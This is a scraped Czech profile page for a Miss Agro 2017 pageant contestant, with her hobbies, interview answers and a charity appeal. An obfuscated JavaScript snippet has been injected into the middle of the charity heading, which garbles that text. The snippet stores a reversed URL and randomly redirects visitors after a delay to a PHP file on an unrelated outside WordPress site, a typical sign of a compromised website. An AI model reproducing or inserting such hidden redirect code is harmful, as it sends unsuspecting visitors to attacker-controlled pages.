Kateřina Karásková

Profil

Fotografie

Fakulta: FŽP
Obor: Územní technická a správní služba (UTSS)
Ročník: 2.
Věk:
23

Pochází z Třebíče, kde vystudovala střední školu stavební. Prahu mohla poznat díky studiu na ČZU, a zamilovala si ji natolik, že tam chce už zůstat. Mezi její koníčky patří kreslení, cestování, vaření a modeling. Má ráda český rock, dobré jídlo, přátele, sluníčko, moře a kvalitní rum. Je veselá, společenská a ráda poznává nové lidi, taky proto se přihlásila do Miss Agro a hodlá si to pořádně užít!

“Podporujeme

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}domovů“ css=“.vc_custom_1492523356766{margin-top: 30px !important;}“]Miss Agro podporuje mladé studenty z dětských domovů prostřednictvím Nadačního fondu Veroniky Kašákové. Podpořte je i Vy! Přispět můžete libovolnou částkou na účet 2113124252/2700. Více informací najdete na webových stránkách www.nfvk.cz. Děkujeme, že pomáháte!

Proč by ses zrovna Ty měla stát Miss Agro 2017?

A proč ne? 🙂

Kdyby ses mohla narodit ještě jednou, kým bys chtěla být?

Zase já. S nikým bych neměnila a nikdo jiný bych být nechtěla. A i když samozřejmě na svůj život někdy nedávám, jsem za něj ráda a baví mě. A taky mě zajímá, jak dopadne.

Proč sis vybrala zrovna studium na ČZU a co máš na ní nejraději?

Upřímně, na začátku čtvrťáku jsem vůbec nevěděla, co bych měla jít studovat. Když se blížil termín podávání přihlášek, věděla jsem jen to, že chci do Prahy. Tak jsem si našla veřejné školy a začala projíždět co nabízí. Jako poslední, s naprostou beznadějí, jsem klika na zemědělku. A nevěřila, kolik fakult tu je a kolik oborů ČZU nabízí. Tak jsem si jeden vybrala. (smích) A troufám si říct, že to bylo jedno z nejlepších rozhodnutí v mém životě. Škola mě baví, a atmosféra v kampusu je nezaměnitelná.